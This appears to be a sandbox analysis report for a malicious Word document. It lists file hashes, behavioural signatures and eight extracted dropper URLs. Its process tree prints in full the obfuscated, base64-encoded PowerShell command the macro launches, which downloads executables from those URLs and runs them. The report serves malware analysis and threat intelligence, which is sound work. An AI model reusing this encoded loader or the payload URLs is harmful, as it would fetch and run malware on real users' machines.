Overview

overview

10

Static

static

1

d662e568c3...18.doc

windows7-x64

10

d662e568c3...18.doc

windows10-2004-x64

10

Analysis

  • max time kernel
    117s
  • max time network
    118s
  • platform
    windows7_x64
  • resource
    win7-20240729-en
  • resource tags

    arch:x64arch:x86image:win7-20240729-enlocale:en-usos:windows7-x64system
  • submitted
    20-11-2024 19:19

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    d662e568c3ada720dad0aa0f17466949f6a185fd3c3f3fd2a239225864d50d18.doc

  • Size

    239KB

  • MD5

    50bdb4343c0816c1908b32ff2ba9cea3

  • SHA1

    4ab1840794b41baf7c344663dc4013e45a3bc0ae

  • SHA256

    d662e568c3ada720dad0aa0f17466949f6a185fd3c3f3fd2a239225864d50d18

  • SHA512

    26f6db8694329f87e458da7fefef5e1a468f2b57aa1574e414ba20edb12c3c899f4cad69d17dec7752ff54880126ff69c3eba5491cae19d550887d373e2f1052

  • SSDEEP

    3072:Di8rNzbWOlrV1c231w8N6eXENf7KnEhJivKie6B/w2yiWydwJt3MP0iIepuxQt/:UJiP/w2P83NikmV

Score
10/10
discovery

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://tuankhoi.com/wp-content/CI2oG/
exe.dropper

https://www.microsystem.fr/newsletters/uITRJ/
exe.dropper

https://natfast.com/wp-content/geeVh/
exe.dropper

https://blog.smyrnaweb.com/cgi-bin/Kzd0vdC/
exe.dropper

https://mhkhardware.com/cgi-bin/Mrn/
exe.dropper

https://ostemeda.lt/wp-content/S/
exe.dropper

https://blog.techforing.com/wp-includes/3XgEg7/
exe.dropper

https://techzslack.com/wp-includes/gSXf/

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 3 IoCs
  • Drops file in System32 directory 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Office loads VBA resources, possible macro or embedded object present
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\d662e568c3ada720dad0aa0f17466949f6a185fd3c3f3fd2a239225864d50d18.doc"
    1⤵
    • Drops file in Windows directory
    • System Location Discovery: System Language Discovery
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:304
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:1560
    • C:\Windows\System32\WindowsPowerShell\v1.0\POwersheLL.exe
      POwersheLL -ENCOD IAAgACQATABFADUAYgAwAG8AIAA9ACAAIABbAHQAeQBQAEUAXQAoACIAewA1AH0AewAxAH0AewAzAH0AewAwAH0AewAyAH0AewA0AH0AIgAtAEYAIAAnAE0ALgAnACwAJwB5AHMAVAAnACwAJwBpAG8ALgBkAGkAUgBlAEMAVABPACcALAAnAGUAJwAsACcAUgB5ACcALAAnAFMAJwApACAAIAA7AHMAZQBUACAAZQBoAG8AIAAoACAAIABbAFQAeQBQAEUAXQAoACIAewA3AH0AewA1AH0AewA0AH0AewA2AH0AewAxAH0AewA4AH0AewAyAH0AewAzAH0AewAwAH0AIgAgAC0ARgAnAEEAZwBFAFIAJwAsACcAUwBFAFIAdgAnACwAJwBDAGUAUABPAEkATgBUACcALAAnAG0AQQBOACcALAAnAC4ATgBFACcALAAnAHQAZQBNACcALAAnAHQALgAnACwAJwBzAHkAUwAnACwAJwBpACcAKQAgACkAOwAgACAAJABNADcAaQB2ADYAaQAyAD0AKAAoACcAVgB0AHYAJwArACcAMgAnACkAKwAoACcAaAAnACsAJwBwAHIAJwApACkAOwAkAFoAMQB2AGIAdABuAHkAPQAkAEQAbgBrADIAMgBjAHMAIAArACAAWwBjAGgAYQByAF0AKAA2ADQAKQAgACsAIAAkAEYANABzAGMAdABpADIAOwAkAEYAcQB1AHkAZgBkAHgAPQAoACgAJwBZADQAJwArACcAegAnACkAKwAoACcAbgByACcAKwAnAGMAcQAnACkAKQA7ACAAIAAkAEwARQA1AEIAMABvADoAOgAiAEMAYABSAEUAQQB0AGAARQBEAGkAYABSAGUAYwB0AG8AUgBZACIAKAAkAEgATwBNAEUAIAArACAAKAAoACcAewAnACsAJwAwAH0AJwArACgAJwBHAHoAYwBzADgAJwArACcAYgAnACkAKwAnADUAewAwAH0ARQBlAG0AJwArACcAcAB3AHIAcgB7ADAAfQAnACkAIAAtAGYAIABbAGMAaABBAFIAXQA5ADIAKQApADsAJABRADkAbABpAGgAMgBwAD0AKAAnAEoAJwArACcANQAnACsAKAAnAG4AYwAnACsAJwAxAHkAMgAnACkAKQA7ACAAJABlAGgATwA6ADoAIgBzAGUAQwBgAFUAUgBpAFQAeQBgAFAAUgBvAHQAbwBgAEMAYABvAEwAIgAgAD0AIAAoACgAJwBUACcAKwAnAGwAcwAnACkAKwAnADEAMgAnACkAOwAkAFUAZABzADIANgA1AGsAPQAoACcAVAAnACsAJwBpACcAKwAoACcANAAwAG8AZgAnACsAJwA5ACcAKQApADsAJABVADQANwB1AHAANAB2ACAAPQAgACgAJwBKACcAKwAoACcAMwBwACcAKwAnAHcAOQBzACcAKQApADsAJABNAGIAZQBrAGwAMQB2AD0AKAAoACcARwBiACcAKwAnAGQAJwApACsAJwB1AG8AJwArACcAdgB6ACcAKQA7ACQAVgB4AGsAcwAwADAAcQA9ACgAJwBGACcAKwAnADcAJwArACgAJwBqACcAKwAnAHoAOQBqAGYAJwApACkAOwAkAEMAcwA3AHUAcQA0AHIAPQAkAEgATwBNAEUAKwAoACgAJwAxADYAJwArACgAJwBWAEcAegAnACsAJwBjACcAKQArACgAJwBzADgAJwArACcAYgA1ADEAJwApACsAKAAnADYAVgBFAGUAbQAnACsAJwBwACcAKQArACgAJwB3AHIAcgAnACsAJwAxADYAVgAnACkAKQAtAGMAUgBFAFAAbABBAGMAZQAgACAAKABbAEMAaABBAHIAXQA0ADkAKwBbAEMAaABBAHIAXQA1ADQAKwBbAEMAaABBAHIAXQA4ADYAKQAsAFsAQwBoAEEAcgBdADkAMgApACsAJABVADQANwB1AHAANAB2ACsAKAAnAC4AJwArACgAJwBlACcAKwAnAHgAZQAnACkAKQA7ACQASAA0AGEAMQAyAHQAMAA9ACgAKAAnAEUANwAnACsAJwB0ADgAJwApACsAJwBsACcAKwAnAHYAdQAnACkAOwAkAFUAZwB3AGcAXwAzAHYAPQAuACgAJwBuAGUAdwAnACsAJwAtAG8AYgBqAGUAJwArACcAYwB0ACcAKQAgAE4ARQB0AC4AVwBFAEIAYwBsAEkARQBuAFQAOwAkAEwAeABkAGUAaAByAGEAPQAoACgAKAAoACcAaAB0AHQAcAA6AF0AWwAgADEAKQAnACsAJwAgAGoAagBrAGcAUwAgAFsAJwArACcAXQAnACsAJwAgACcAKQApACsAKAAoACcAWwBdAHcAXQBbACAAMQApACcAKwAnACAAagBqAGsAZwBTACAAWwBdACAAWwBdAHcAdAB1AGEAbgBrACcAKwAnAGgAbwBpAC4AYwBvAG0AXQBbACAAMQApACAAJwArACcAagBqACcAKwAnAGsAZwBTACcAKwAnACAAWwBdACAAWwBdAHcAdwBwACcAKwAnAC0AYwBvAG4AdABlAG4AJwArACcAdABdACcAKwAnAFsAIAAnACsAJwAxACcAKwAnACkAIABqAGoAJwArACcAawBnACcAKwAnAFMAJwArACcAIABbAF0AJwArACcAIAAnACsAJwBbAF0AdwBDAEkAJwArACcAMgAnACsAJwBvAEcAJwArACcAXQBbACAAMQApACAAagAnACsAJwBqAGsAZwBTACcAKwAnACAAWwBdACcAKwAnACAAWwBdAHcAQABoAHQAdABwACcAKwAnAHMAOgBdACcAKwAnAFsAIAAxACcAKwAnACkAIABqAGoAJwArACcAawBnACcAKwAnAFMAIABbAF0AIABbAF0AJwArACcAdwBdACcAKwAnAFsAIAAxACkAIABqAGoAawBnAFMAJwArACcAIAAnACkAKQArACgAKAAnAFsAXQAgACcAKwAnAFsAXQB3AHcAdwB3AC4AbQBpACcAKwAnAGMAcgBvAHMAJwArACcAeQAnACsAJwBzAHQAZQAnACsAJwBtAC4AZgAnACsAJwByAF0AWwAgACcAKwAnADEAKQAgAGoAagAnACsAJwBrAGcAUwAgAFsAXQAgAFsAXQB3AG4AZQB3AHMAbABlAHQAdABlAHIAcwBdACcAKwAnAFsAIAAxACkAIAAnACsAJwBqAGoAawBnACcAKwAnAFMAIABbAF0AJwArACcAIAAnACsAJwBbAF0AJwArACcAdwB1ACcAKwAnAEkAJwArACcAVAAnACsAJwBSAEoAJwArACcAXQBbACcAKwAnACAAMQAnACsAJwApACAAagBqACcAKQApACsAKAAoACcAawBnAFMAIAAnACsAJwBbAF0AIABbAF0AdwBAAGgAdAB0AHAAcwA6ACcAKwAnAF0AWwAnACsAJwAgADEAKQAgAGoAagBrAGcAUwAgAFsAXQAgAFsAXQB3AF0AWwAgADEAKQAgAGoAagAnACsAJwBrAGcAUwAnACsAJwAgAFsAXQAgAFsAJwArACcAXQAnACsAJwB3AG4AJwArACcAYQAnACkAKQArACgAKAAnAHQAZgAnACsAJwBhAHMAdAAuAGMAbwBtACcAKwAnAF0AWwAgADEAJwArACcAKQAgAGoAagBrAGcAUwAnACsAJwAgAFsAXQAnACsAJwAgAFsAJwArACcAXQB3ACcAKwAnAHcAcAAtACcAKwAnAGMAJwArACcAbwBuAHQAZQAnACsAJwBuAHQAXQBbACAAMQApACAAJwArACcAagAnACsAJwBqACcAKwAnAGsAJwApACkAKwAoACgAJwBnAFMAIAAnACsAJwBbAF0AJwArACcAIAAnACsAJwBbACcAKwAnAF0AJwArACcAdwBnAGUAJwArACcAZQBWAGgAXQAnACsAJwBbACAAMQApACAAJwArACcAagBqAGsAJwArACcAZwBTACAAWwBdACAAWwBdAHcAQABoAHQAJwArACcAdABwAHMAJwArACcAOgBdAFsAIAAxACcAKwAnACkAIABqAGoAawAnACsAJwBnAFMAJwArACcAIAAnACsAJwBbAF0AIABbAF0AJwArACcAdwBdACcAKQApACsAKAAoACcAWwAgACcAKwAnADEAKQAgACcAKwAnAGoAagBrAGcAUwAnACsAJwAgAFsAXQAgAFsAXQB3AGIAbABvACcAKwAnAGcALgAnACsAJwBzAG0AeQByACcAKwAnAG4AYQB3AGUAYgAnACkAKQArACgAKAAnAC4AYwAnACsAJwBvAG0AJwArACcAXQBbACAAMQApACAAagBqAGsAZwBTACAAJwArACcAWwBdACAAWwBdACcAKwAnAHcAJwArACcAYwBnAGkALQAnACsAJwBiAGkAbgAnACsAJwBdACcAKwAnAFsAIAAxACcAKwAnACkAIABqAGoAJwArACcAawAnACsAJwBnAFMAJwArACcAIABbACcAKwAnAF0AIAAnACsAJwBbACcAKwAnAF0AdwBLAHoAJwArACcAZAAwACcAKwAnAHYAZABDAF0AJwArACcAWwAnACsAJwAgADEAKQAnACsAJwAgAGoAagBrAGcAUwAnACsAJwAgAFsAJwArACcAXQAgAFsAXQB3AEAAJwArACcAaAB0AHQAcABzACcAKwAnADoAXQBbACAAMQApACAAagBqAGsAZwBTACAAWwBdACAAJwArACcAWwBdAHcAXQBbACcAKwAnACAAMQApACAAagBqAGsAZwBTACAAJwArACcAWwAnACsAJwBdACAAWwBdAHcAbQAnACsAJwBoAGsAJwArACcAaABhACcAKwAnAHIAZAB3AGEAcgBlAC4AYwBvAG0AXQBbACAAMQApACcAKwAnACAAagBqAGsAZwBTACAAWwBdACcAKQApACsAKAAoACcAIABbAF0AdwBjAGcAaQAnACsAJwAtAGIAaQBuAF0AWwAgADEAKQAgACcAKwAnAGoAJwArACcAagBrAGcAJwArACcAUwAgAFsAXQAnACsAJwAgAFsAJwArACcAXQAnACsAJwB3AE0AcgAnACsAJwBuAF0AJwApACkAKwAoACgAJwBbACAAMQApACAAJwArACcAagAnACsAJwBqACcAKwAnAGsAZwBTACAAWwBdACAAWwBdAHcAQABoACcAKwAnAHQAdAAnACkAKQArACgAKAAnAHAAJwArACcAcwA6ACcAKwAnAF0AWwAgADEAKQAgAGoAagBrAGcAUwAnACsAJwAgACcAKwAnAFsAXQAgAFsAXQB3AF0AWwAgADEAKQAgAGoAagAnACsAJwBrAGcAJwArACcAUwAnACsAJwAgAFsAXQAgAFsAJwArACcAXQB3AG8AJwArACcAcwB0AGUAbQBlAGQAYQAuAGwAJwArACcAdABdACcAKQApACsAKAAoACcAWwAgADEAKQAgAGoAagBrACcAKwAnAGcAJwArACcAUwAgAFsAXQAnACsAJwAgAFsAXQB3AHcAcAAtAGMAJwArACcAbwBuAHQAJwArACcAZQAnACkAKQArACgAKAAnAG4AdABdAFsAIAAxACkAIABqAGoAJwArACcAawBnACcAKwAnAFMAJwArACcAIAAnACkAKQArACgAKAAnAFsAXQAgAFsAXQB3AFMAXQAnACsAJwBbACAAMQApACcAKwAnACAAagBqAGsAJwArACcAZwBTACAAJwArACcAWwAnACsAJwBdACAAWwAnACsAJwBdAHcAQABoAHQAdABwAHMAOgBdACcAKwAnAFsAIAAxACkAIABqAGoAawBnAFMAJwArACcAIABbAF0AJwArACcAIABbAF0AdwBdAFsAIAAnACsAJwAxACkAIABqAGoAawBnAFMAIAAnACsAJwBbAF0AIABbAF0AdwBiAGwAJwArACcAbwBnACcAKwAnAC4AdABlAGMAaABmAG8AcgBpAG4AZwAuACcAKwAnAGMAJwArACcAbwBtACcAKwAnAF0AWwAgACcAKwAnADEAJwArACcAKQAgAGoAagBrAGcAUwAnACsAJwAgAFsAXQAgAFsAJwApACkAKwAoACgAJwBdACcAKwAnAHcAdwBwAC0AaQAnACsAJwBuAGMAbAB1ACcAKwAnAGQAZQBzAF0AWwAgACcAKwAnADEAKQAgAGoAagBrAGcAUwAgAFsAXQAgAFsAXQAnACsAJwB3ADMAWABnAEUAZwA3AF0AWwAnACsAJwAgADEAKQAgAGoAagAnACsAJwBrAGcAUwAnACsAJwAgAFsAXQAgACcAKwAnAFsAXQAnACsAJwB3AEAAJwArACcAaAB0AHQAcABzADoAJwArACcAXQBbACAAMQApACAAagBqAGsAZwBTACAAWwAnACsAJwBdACAAWwBdAHcAXQBbACAAMQApACAAagAnACsAJwBqAGsAZwBTACcAKwAnACAAWwAnACkAKQArACgAJwBdACAAWwBdACcAKwAnAHcAdABlAGMAaAAnACsAJwB6AHMAbABhACcAKwAnAGMAJwApACsAKAAnAGsALgBjAG8AJwArACcAbQAnACkAKwAoACgAJwBdAFsAIAAxACkAIABqAGoAawBnACcAKwAnAFMAJwArACcAIABbAF0AIABbAF0AJwArACcAdwB3AHAALQBpAG4AYwBsAHUAJwArACcAZABlACcAKwAnAHMAJwArACcAXQAnACkAKQArACgAKAAnAFsAIAAnACsAJwAxACkAIABqAGoAJwArACcAawAnACsAJwBnAFMAIABbAF0AIABbACcAKQApACsAKAAoACcAXQAnACsAJwB3ACcAKwAnAGcAUwBYAGYAXQBbACAAMQAnACsAJwApACcAKwAnACAAagAnACsAJwBqAGsAZwBTACAAWwAnACsAJwBdACcAKQApACsAKAAnACAAJwArACcAWwBdAHcAJwApACkAKQAuACIAcgBlAGAAcABsAEEAQwBlACIAKAAoACgAKAAnAF0AWwAnACsAJwAgADEAJwApACsAKAAoACcAKQAnACsAJwAgAGoAJwApACkAKwAoACcAagBrAGcAJwArACcAUwAnACkAKwAnACAAJwArACgAJwBbAF0AIAAnACsAJwBbAF0AdwAnACkAKQApACwAKABbAGEAcgByAGEAeQBdACgAJwAvACcAKQAsACgAJwB4ACcAKwAnAHcAZQAnACkAKQBbADAAXQApAC4AIgBzAHAAbABgAGkAVAAiACgAJABSADcAdgAwAHkAYQBsACAAKwAgACQAWgAxAHYAYgB0AG4AeQAgACsAIAAkAFAAZABjAHEAcgA3AG8AKQA7ACQAWABxAGoAdwB1ADAAZgA9ACgAKAAnAFIAXwBtACcAKwAnAGMAJwApACsAKAAnAHEAdQAnACsAJwAyACcAKQApADsAZgBvAHIAZQBhAGMAaAAgACgAJABZAGMAawB6AHYAbAA4ACAAaQBuACAAJABMAHgAZABlAGgAcgBhACkAewB0AHIAeQB7ACQAVQBnAHcAZwBfADMAdgAuACIARABPAGAAVwBOAGAAbABvAEEAZABmAGkAbABFACIAKAAkAFkAYwBrAHoAdgBsADgALAAgACQAQwBzADcAdQBxADQAcgApADsAJABJADEAYQBjAHkAaABfAD0AKAAoACcATQBzACcAKwAnAGYAeAAnACkAKwAoACcAcgAnACsAJwB0ADUAJwApACkAOwBJAGYAIAAoACgALgAoACcARwBlAHQALQAnACsAJwBJACcAKwAnAHQAZQBtACcAKQAgACQAQwBzADcAdQBxADQAcgApAC4AIgBMAGUAYABOAEcAYABUAGgAIgAgAC0AZwBlACAAMwA1ADQAMgA5ACkAIAB7ACgAWwB3AG0AaQBjAGwAYQBzAHMAXQAoACgAJwB3AGkAbgAzACcAKwAnADIAXwAnACkAKwAoACcAUAByAG8AYwAnACsAJwBlACcAKQArACcAcwBzACcAKQApAC4AIgBDAFIAYABFAGAAQQBUAEUAIgAoACQAQwBzADcAdQBxADQAcgApADsAJABOAGEANgBtADAAXwAxAD0AKAAoACcASABqAHkAJwArACcAeQAnACkAKwAnAGkAJwArACcAZABiACcAKQA7AGIAcgBlAGEAawA7ACQATABkADIANwBtAG0AegA9ACgAJwBZAGUAJwArACcAYwA1ACcAKwAoACcAcwA1ACcAKwAnAGcAJwApACkAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAEIAdgA5AHQANwBrAG8APQAoACcASAAnACsAKAAnAG0AbwAnACsAJwA5ACcAKQArACgAJwBsAHgAJwArACcAaQAnACkAKQA=
      1⤵
      • Process spawned unexpected child process
      • Blocklisted process makes network request
      • Drops file in System32 directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2820

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • memory/304-31-0x0000000005E70000-0x0000000005F70000-memory.dmp

      Filesize

      1024KB

      Download

    • memory/304-2-0x0000000073C4D000-0x0000000073C58000-memory.dmp

      Filesize

      44KB

      Download

    • memory/304-40-0x0000000005E70000-0x0000000005F70000-memory.dmp

      Filesize

      1024KB

      Download

    • memory/304-39-0x0000000005E70000-0x0000000005F70000-memory.dmp

      Filesize

      1024KB

      Download

    • memory/304-16-0x0000000005E70000-0x0000000005F70000-memory.dmp

      Filesize

      1024KB

      Download

    • memory/304-30-0x0000000005E70000-0x0000000005F70000-memory.dmp

      Filesize

      1024KB

      Download

    • memory/304-29-0x0000000005E70000-0x0000000005F70000-memory.dmp

      Filesize

      1024KB

      Download

    • memory/304-32-0x0000000005E70000-0x0000000005F70000-memory.dmp

      Filesize

      1024KB

      Download

    • memory/304-55-0x0000000005E70000-0x0000000005F70000-memory.dmp

      Filesize

      1024KB

      Download

    • memory/304-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

      Download

    • memory/304-6-0x0000000005E70000-0x0000000005F70000-memory.dmp

      Filesize

      1024KB

      Download

    • memory/304-0-0x000000002F8F1000-0x000000002F8F2000-memory.dmp

      Filesize

      4KB

      Download

    • memory/304-54-0x0000000005E70000-0x0000000005F70000-memory.dmp

      Filesize

      1024KB

      Download

    • memory/304-48-0x0000000073C4D000-0x0000000073C58000-memory.dmp

      Filesize

      44KB

      Download

    • memory/304-50-0x0000000005E70000-0x0000000005F70000-memory.dmp

      Filesize

      1024KB

      Download

    • memory/304-53-0x00000000068D0000-0x00000000069D0000-memory.dmp

      Filesize

      1024KB

      Download

    • memory/2820-46-0x000000001B680000-0x000000001B962000-memory.dmp

      Filesize

      2.9MB

      Download

    • memory/2820-47-0x0000000001EF0000-0x0000000001EF8000-memory.dmp

      Filesize

      32KB

      Download